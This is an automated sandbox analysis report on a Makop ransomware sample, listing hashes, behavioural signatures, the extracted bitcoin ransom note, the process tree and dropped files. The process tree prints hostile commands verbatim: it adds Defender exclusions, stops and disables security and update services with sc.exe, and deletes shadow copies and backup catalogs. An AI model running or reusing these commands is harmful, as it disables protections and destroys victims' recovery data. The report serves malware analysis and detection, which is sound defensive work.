Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    136s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/09/2022, 04:04

General

  • Target

    HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe

  • Size

    1.9MB

  • MD5

    40ec0e62856036983be04f31ce670fb9

  • SHA1

    0d04b8139fe71a1736a8168fbf072df61d7d7bd6

  • SHA256

    48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521

  • SHA512

    1094d49d3fcb757fe2d1c49d1e441ab086f4cff80ffd8572b0017546350838dcba83f102796009d811a360f6825928c13e3697b7dd462627bb83fb92534fc806

  • SSDEEP

    192:z/TeYoeb67sc8+otH8SESePujd2kTCMZehZtzMuuQzBLerxA/GWeGMEd022XbTFi:z/yYoebe5JotHESxjuM63KI

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\readme-warning.txt

Family

makop

Ransom Note
::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted and now have the "makop" extension. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in bitcoins. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: You can write us to our mailbox: [email protected] .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don�t want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

Signatures

  • Makop

    Ransomware family discovered by @VK_Intel in early 2020.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Windows security bypass 2 TTPs 2 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Nirsoft 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 3 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Windows security modification 2 TTPs 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 22 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
    "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Windows security bypass
    • Checks computer location settings
    • Windows security modification
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe
        "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe" /SpecialRun 4101d8 2736
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3124
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2004
    • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
      "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:320
      • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
        "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" n320
        3⤵
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe
          "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4192
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3440
            • C:\Windows\system32\sc.exe
              sc stop windefend
              6⤵
              • Launches sc.exe
              PID:4720
            • C:\Windows\system32\sc.exe
              sc config windefend start= disabled
              6⤵
              • Launches sc.exe
              PID:2340
            • C:\Windows\system32\sc.exe
              sc stop Sense
              6⤵
              • Launches sc.exe
              PID:1260
            • C:\Windows\system32\sc.exe
              sc config Sense start= disabled
              6⤵
              • Launches sc.exe
              PID:612
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              6⤵
              • Launches sc.exe
              PID:3620
            • C:\Windows\system32\sc.exe
              sc config wuauserv start= disabled
              6⤵
              • Launches sc.exe
              PID:3196
            • C:\Windows\system32\sc.exe
              sc stop usosvc
              6⤵
              • Launches sc.exe
              PID:3528
            • C:\Windows\system32\sc.exe
              sc config usosvc start= disabled
              6⤵
              • Launches sc.exe
              PID:3936
            • C:\Windows\system32\sc.exe
              sc stop WaasMedicSvc
              6⤵
              • Launches sc.exe
              PID:1220
            • C:\Windows\system32\sc.exe
              sc config WaasMedicSvc start= disabled
              6⤵
              • Launches sc.exe
              PID:3192
            • C:\Windows\system32\sc.exe
              sc stop SecurityHealthService
              6⤵
              • Launches sc.exe
              PID:2800
            • C:\Windows\system32\sc.exe
              sc config SecurityHealthService start= disabled
              6⤵
              • Launches sc.exe
              PID:1860
            • C:\Windows\system32\sc.exe
              sc stop SDRSVC
              6⤵
              • Launches sc.exe
              PID:2752
            • C:\Windows\system32\sc.exe
              sc config SDRSVC start= disabled
              6⤵
              • Launches sc.exe
              PID:728
            • C:\Windows\system32\sc.exe
              sc stop wscsvc
              6⤵
              • Launches sc.exe
              PID:4200
            • C:\Windows\system32\sc.exe
              sc config wscsvc start= disabled
              6⤵
              • Launches sc.exe
              PID:3228
            • C:\Windows\system32\sc.exe
              sc stop WdiServiceHost
              6⤵
              • Launches sc.exe
              PID:3096
            • C:\Windows\system32\sc.exe
              sc config WdiServiceHost start= disabled
              6⤵
              • Launches sc.exe
              PID:3888
            • C:\Windows\system32\sc.exe
              sc stop WdiSystemHost
              6⤵
              • Launches sc.exe
              PID:4544
            • C:\Windows\system32\sc.exe
              sc config WdiSystemHost start= disabled
              6⤵
              • Launches sc.exe
              PID:1016
            • C:\Windows\system32\sc.exe
              sc stop InstallService
              6⤵
              • Launches sc.exe
              PID:1724
            • C:\Windows\system32\sc.exe
              sc config InstallService Start= disabled
              6⤵
              • Launches sc.exe
              PID:5048
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" -Force
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4556
        • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
          "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"
          4⤵
            PID:2736
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1828
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:1476
          • C:\Windows\system32\wbadmin.exe
            wbadmin delete catalog -quiet
            4⤵
            • Deletes backup catalog
            PID:2044
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3436
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4676
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4108
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:892
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:2092
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:4668

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe.log

        Filesize

        1KB

        MD5

        c8ba28b4adef1e31506663447c4fb877

        SHA1

        ab07929915ab927500c2fb32757f0512a0fa050e

        SHA256

        589ddf313adbbe748a1d83d08ff4ec49b7cc6d6ca9d756ae38a779efe331add2

        SHA512

        1778691f90f45240ba9460f0eb06c8ab72f845f2b841fdfdeb0da3e8c4e293fb11f40c858369cb7c8f5ea5fe45891b8cf1c968849fc3ce2251f517e0c519906d

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        968cb9309758126772781b83adb8a28f

        SHA1

        8da30e71accf186b2ba11da1797cf67f8f78b47c

        SHA256

        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

        SHA512

        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        18KB

        MD5

        37a6f16ed97a62d9dc7f77f022caaa70

        SHA1

        c2abfe26b5bb4cb9f74bb4a45d4d5d885490121d

        SHA256

        d4c6fd529ccc40f6bfbb1a6618a497d9108082b62d4900c7c03048c40a4c5a02

        SHA512

        94706518a04d4ff7957a2b6735b40f804ecfee0f51524b7003daf15df03d1816347e91e5681a70efd298d6eff316f7e966e45824af998a0dbe274631323f0e6a

      • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe

        Filesize

        88KB

        MD5

        17fc12902f4769af3a9271eb4e2dacce

        SHA1

        9a4a1581cc3971579574f837e110f3bd6d529dab

        SHA256

        29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

        SHA512

        036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

      • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\readme-warning.txt

        Filesize

        1KB

        MD5

        e217e139ef30c6b01a891a46abdfdfdb

        SHA1

        b7fcffce07cbdc0408c8156f22ac6ab0a8c742c9

        SHA256

        cb631d734d62dce1742744b81cccd7418c27fa6da089d366378b43c00186598e

        SHA512

        a22208a2537138f0b70087b1f0f10972e2ed2feb3ea8ea2f7bc0f7668a4fc1b807aaa7173d04ff04d415c043e1278357d39c7f539b4037ebbc6926e21863d117

      • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat

        Filesize

        8KB

        MD5

        b2a5ef7d334bdf866113c6f4f9036aae

        SHA1

        f9027f2827b35840487efd04e818121b5a8541e0

        SHA256

        27426aa52448e564b5b9dff2dbe62037992ada8336a8e36560cee7a94930c45e

        SHA512

        8ed39ed39e03fa6d4e49167e8ca4823e47a221294945c141b241cfd1eb7d20314a15608da3fafc3c258ae2cfc535d3e5925b56caceee87acfb7d4831d267189e

      • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat.[9C4C1438].[[email protected]].makop

        Filesize

        8KB

        MD5

        263655b1a06d30281358b83adfea8d4e

        SHA1

        e070e79d63fce882d648d1af15c8e4247fc25a0f

        SHA256

        145547d6f2dfed7e74bc8abf7c16b1858a9f1d6a6b78817e56d6fae027c4d15d

        SHA512

        867e39e8c7f9bc8a9395c41db013d4648169239fef42db8e0cffe6df2cd6cb8dfc09b039473ab35ad8ddafcf3364f66dcc9b28c6c1d2a931300b221d30088048

      • C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe

        Filesize

        88KB

        MD5

        17fc12902f4769af3a9271eb4e2dacce

        SHA1

        9a4a1581cc3971579574f837e110f3bd6d529dab

        SHA256

        29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

        SHA512

        036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

      • C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe

        Filesize

        88KB

        MD5

        17fc12902f4769af3a9271eb4e2dacce

        SHA1

        9a4a1581cc3971579574f837e110f3bd6d529dab

        SHA256

        29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

        SHA512

        036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

      • C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe

        Filesize

        88KB

        MD5

        17fc12902f4769af3a9271eb4e2dacce

        SHA1

        9a4a1581cc3971579574f837e110f3bd6d529dab

        SHA256

        29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

        SHA512

        036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

      • memory/320-156-0x0000000000400000-0x000000000041E000-memory.dmp

        Filesize

        120KB

      • memory/320-158-0x0000000000400000-0x000000000041E000-memory.dmp

        Filesize

        120KB

      • memory/320-163-0x0000000000400000-0x000000000041E000-memory.dmp

        Filesize

        120KB

      • memory/2004-149-0x0000000006F10000-0x0000000006F2E000-memory.dmp

        Filesize

        120KB

      • memory/2004-141-0x0000000003060000-0x0000000003096000-memory.dmp

        Filesize

        216KB

      • memory/2004-153-0x0000000007EF0000-0x0000000007F86000-memory.dmp

        Filesize

        600KB

      • memory/2004-159-0x0000000007FB0000-0x0000000007FCA000-memory.dmp

        Filesize

        104KB

      • memory/2004-160-0x0000000007F90000-0x0000000007F98000-memory.dmp

        Filesize

        32KB

      • memory/2004-152-0x0000000007AD0000-0x0000000007ADA000-memory.dmp

        Filesize

        40KB

      • memory/2004-151-0x0000000007A60000-0x0000000007A7A000-memory.dmp

        Filesize

        104KB

      • memory/2004-150-0x0000000008390000-0x0000000008A0A000-memory.dmp

        Filesize

        6.5MB

      • memory/2004-155-0x0000000007EA0000-0x0000000007EAE000-memory.dmp

        Filesize

        56KB

      • memory/2004-142-0x0000000005C10000-0x0000000006238000-memory.dmp

        Filesize

        6.2MB

      • memory/2004-143-0x0000000005AC0000-0x0000000005AE2000-memory.dmp

        Filesize

        136KB

      • memory/2004-148-0x000000006FC40000-0x000000006FC8C000-memory.dmp

        Filesize

        304KB

      • memory/2004-144-0x0000000006240000-0x00000000062A6000-memory.dmp

        Filesize

        408KB

      • memory/2004-145-0x0000000006360000-0x00000000063C6000-memory.dmp

        Filesize

        408KB

      • memory/2004-147-0x0000000006F30000-0x0000000006F62000-memory.dmp

        Filesize

        200KB

      • memory/2004-146-0x0000000006970000-0x000000000698E000-memory.dmp

        Filesize

        120KB

      • memory/2736-203-0x0000000000400000-0x000000000041E000-memory.dmp

        Filesize

        120KB

      • memory/3972-134-0x0000000006FD0000-0x0000000007574000-memory.dmp

        Filesize

        5.6MB

      • memory/3972-132-0x0000000000A60000-0x0000000000C54000-memory.dmp

        Filesize

        2.0MB

      • memory/3972-133-0x00000000057E0000-0x000000000587C000-memory.dmp

        Filesize

        624KB

      • memory/4556-198-0x000000006FC40000-0x000000006FC8C000-memory.dmp

        Filesize

        304KB